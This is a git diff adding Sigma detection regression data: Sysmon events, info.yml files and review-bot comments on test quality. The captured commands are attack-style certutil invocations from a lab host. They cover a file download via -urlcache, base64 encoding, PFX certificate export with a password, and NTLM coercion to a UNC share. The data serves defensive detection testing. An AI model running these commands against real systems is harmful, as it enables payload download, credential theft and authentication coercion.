"Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml new file mode 100644 index 000000000..69a87ef61 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml @@ -0,0 +1,13 @@ +id: 507f6de5-f414-4825-b1a3-e8909fdc8700 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 + title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx 
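Review bot: the JSON file added in this hunk is not referenced by the sibling info.yml (`type: evtx`, `path: ...42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx`), so nothing in CI checks that it still matches the evtx it mirrors. Either register it as a second test input, if the runner accepts JSON, or state in the CI documentation that the .json files are human-readable exports kept for review only.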
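Review bot: `description: N/A` in the info.yml hunk leaves the sample undocumented, and the same placeholder recurs in every other info.yml in this patch; the captured CommandLine (`certutil.exe -urlcache -f https://raw.githubusercontent.com/... atomic.yaml`) makes it easy to state which file-sharing domain the rule is expected to match and that the record was taken from the attack range host. Separately, `date: 2025-10-24` is a day earlier than the event's `SystemTime` (2025-10-25T17:02:36Z); if `date` is meant to be the capture date it should match, otherwise define the field's meaning in the CI docs.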
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a244931086d9dd6905d25e1ea055ae4443ab3b98 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml new file mode 100644 index 000000000..cbffd1a7d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml @@ -0,0 +1,13 @@ +id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + title: File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a244931086d9dd6905d25e1ea055ae4443ab3b98 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
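Review bot: this record is byte-for-byte the one already added for rule e62a9f0c (same `EventRecordID` 11570013, same `ProcessGuid`, same `SystemTime` 2025-10-25T17:04:22Z, same `CommandLine` `certutil -encode file.bat file_.base64`, and the same blob index `e27376def` for the JSON and `a244931086d9...` for the evtx), so the "Suspicious File Encoded To Base64" rule is regression-tested with exactly the event that exercises the generic encode rule. If `.bat` is the extension meant to trigger the suspicious variant, say so in the sibling info.yml; otherwise capture a distinct sample so the two tests actually differ, and consider sharing the file rather than committing two identical 69632-byte blobs.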
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml new file mode 100644 index 000000000..e9c14e662 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml @@ -0,0 +1,13 @@ +id: 7033fe69-1fd7-4da2-b525-222c1b087107 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 + title: Suspicious File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx new file mode 100644 index 0000000000000000000000000000000000000000..25f49180b9aeef49419defb3e346bfe3c5119628 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json new file mode 100644 index 000000000..2b673ca59 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:05:11.334152Z" + } + }, + "EventRecordID": 11585346, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:05:11.327", + "ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002", + "ProcessId": 6780, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml new file mode 100644 index 000000000..0d8a289ea --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml @@ -0,0 +1,13 @@ +id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 + title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx 
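Review bot: `description: N/A` in the info.yml hunk is a placeholder; reviewers and the CI read this file before the binary, so replace it with a one-line statement of what the sample simulates, e.g. `description: certutil -encode of a file under AppData\Roaming\Microsoft\Network` (the CommandLine shown in the JSON rendering above), so the expected single match can be judged without opening the evtx. The same `N/A` placeholder is repeated in the other info.yml files added in this patch.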
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx new file mode 100644 index 0000000000000000000000000000000000000000..71da251ef5906c4c5b3d98006c39210bc5a24173 GIT binary patch literal 69632
literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json new file mode 100644 index 000000000..9ec2762cb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:23:42.049726Z" + } + }, + "EventRecordID": 11818106, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:23:42.043", + "ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002", + "ProcessId": 2456, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml new file mode 100644 index 000000000..83cf4ab17 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml @@ -0,0 +1,13 @@ +id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 + title: Certificate Exported Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx 
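Review bot: `date: 2025-10-24` in the info.yml hunk precedes the event it describes, whose `UtcTime` in the JSON rendering above is `2025-10-25 17:23:42.043`; either set `date` to the capture date or document that the field means something else (rule date or test-set creation date), otherwise it cannot be used to trace a sample back to its simulation run. The certutil encode sample above has the same one-day offset.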
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx new file mode 100644 index 0000000000000000000000000000000000000000..394724e61fc22aa75070cd1a7972b8468a578ba1 GIT binary patch literal 69632

literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json new file mode 100644 index 000000000..4fde9eb48 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:26:24.815458Z" + } + }, + "EventRecordID": 11867155, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:26:24.808", + "ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002", + "ProcessId": 4424, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml new file mode 100644 index 000000000..f5243b532 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml @@ -0,0 +1,13 @@ +id: 32397458-1d93-45ee-a3c8-9efebb81d9d1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916 + title: Potential NTLM Coercion Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx 
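Review bot: `path` under `regression_tests_info` references only the `.evtx`, while the `.json` rendering of the same event added in the previous hunk is not referenced from any file in this patch; state whether the CI consumes the JSON (for example through a second entry with its own `type`) or whether it is a human-readable copy only, because an unreferenced duplicate will silently drift from the evtx when samples are regenerated. If it is only a rendering, saying so in `description` (currently `N/A`) or in a README beside the data would make that explicit.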
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx new file mode 100644 index 0000000000000000000000000000000000000000..643bec0f9da7505b0da5f6b2a8ea7507ef4fd436 GIT binary patch literal 69632
zhgr*)Exvic;>(`dgs-mOD*0JE$=AK2^#^?{)h}B#)9*_B z;0=3b6TVWv_g2c!+DpD!ecDGqV<}&@XvX(&Ga=YBoA8zS!?rW2wT$^g2g$ca#bH~R+x7WH_inJ1FIzO_i}4-y%qDzw z{fZWq@`uin?_Z{79k7-!TYN9scv?~DKYkC(0G%NFlE=5qHxyFB%Yp*;p3 z&d~K6i=Sg=&uqe1*Kd{lEK%|uxZT}qi>3Nyi)Q+5jQGo**@UmuZ{_?fN%GBb9QxE+ zzHIUAy)O5(&<1Hw_Pm(aX`0L*a9=yGDu#^@C*vIqCwcN`uuSN6=FTz5#W|MSm7`M%ey@%IDRVocv$_q^q|4|pg) z?abZKX+!9hVgh?+Pp&&9*HhWoP4_)lWBi|1ZZ^aAnVI!PVnA z)s!FXl3YjK7QKjgkO#e%;>DiXk1OR7 zJ0#bBe;w*Wu4Z`zTb%rUuKVQ7l>Qq>-M!^01YP1f4_>ine#*7_c|>`?M!a`Q-tAtq zg10e`V2j>(vuD2^-gLgaOY&~rVYm#-vHrP!74&-!ge++ffA zl=l_-Im*v=ORj9KoL*`6ahs*5l{pa0YyL&Py`eKML-cy1QY>9KoL*` z6ahs*5l{pa0YyL&Py`eKML-cy1QY>9KoL*`6ahs*5l{pa0YyL&Py`eKML-cy1QY>9 yKoL*`6ahs*5l{pa0YyL&Py`eKML-cy1QY>9KoL*`6ahs*5l{pa0Y$*S3H(1Nj-dMh literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json new file mode 100644 index 000000000..fc3726adb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:28:28.958645Z" + } + }, + "EventRecordID": 11905446, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:28:28.957", + "ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002", + "ProcessId": 8208, + "Image": "C:\\Windows\\System32\\chcp.com", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Change CodePage Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CHCP.COM", + "CommandLine": "chcp 936", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml new file mode 100644 index 000000000..20c85ba02 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml @@ -0,0 +1,13 @@ +id: a67c0d0c-3b40-4fef-a39d-5bd528255d90 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7942406-33dd-4377-a564-0f62db0593a3 + title: Suspicious CodePage Switch Via CHCP +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx 
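Review bot: the only test listed is a positive one with `match_count: 1`; if the `regression_tests_info` format allows it, pair it with a non-matching sample (a code page switch the rule is meant to ignore, captured on the same host) and `match_count: 0`, so that a later broadening of the `chcp` selection is caught by CI and not only a narrowing. Separately, the diff above shows an `.evtx` for `proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338` but no `info.yml` or `.json` beside it in this part of the patch; confirm those files are included, since without an `info.yml` the CI has no `path` through which to pick that sample up.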
